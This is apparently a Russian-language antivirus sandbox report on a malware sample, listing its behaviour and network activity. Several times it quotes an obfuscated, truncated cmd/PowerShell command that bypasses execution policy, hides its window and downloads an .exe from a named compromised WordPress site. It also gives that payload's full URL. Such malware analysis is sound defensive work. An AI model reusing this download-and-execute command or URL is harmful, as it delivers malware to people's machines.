Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://felixamaral.com.br/wp-content/themes/cinema/rhywnr7p/ovzlqhbd.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "PowERshEl^L.EXE -E^XE^CUtI^On^POLI^c^y^ bypASs^ ^-^nO^PR^oF^ilE -WINDOws^t^YL^E Hid^DE^N^ (NEw^-ObJEC^t ^SYS^t^EM.^N^eT.wE^B^cLi^ENT).do^w^n^LoAD^FI^l^e('http://felixamaral.c...
Сетевая активность
Подключается к
- 'mo#####.map.fastly.net':443
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- 'fe####maral.com.br':80
- 'fe####maral.com.br':443
TCP
Запросы HTTP GET
- http://fe####maral.com.br/wp-content/themes/cinema/rHYwnR7p/OVzLqHbD.exe
Другие
- '34.##9.100.209':443
- 'fe####maral.com.br':443
UDP
- DNS ASK mo#####.map.fastly.net
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK fe####maral.com.br
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "PowERshEl^L.EXE -E^XE^CUtI^On^POLI^c^y^ bypASs^ ^-^nO^PR^oF^ilE -WINDOws^t^YL^E Hid^DE^N^ (NEw^-ObJEC^t ^SYS^t^EM.^N^eT.wE^B^cLi^ENT).do^w^n^LoAD^FI^l^e('http://felixamaral.c... (со скрытым окном)
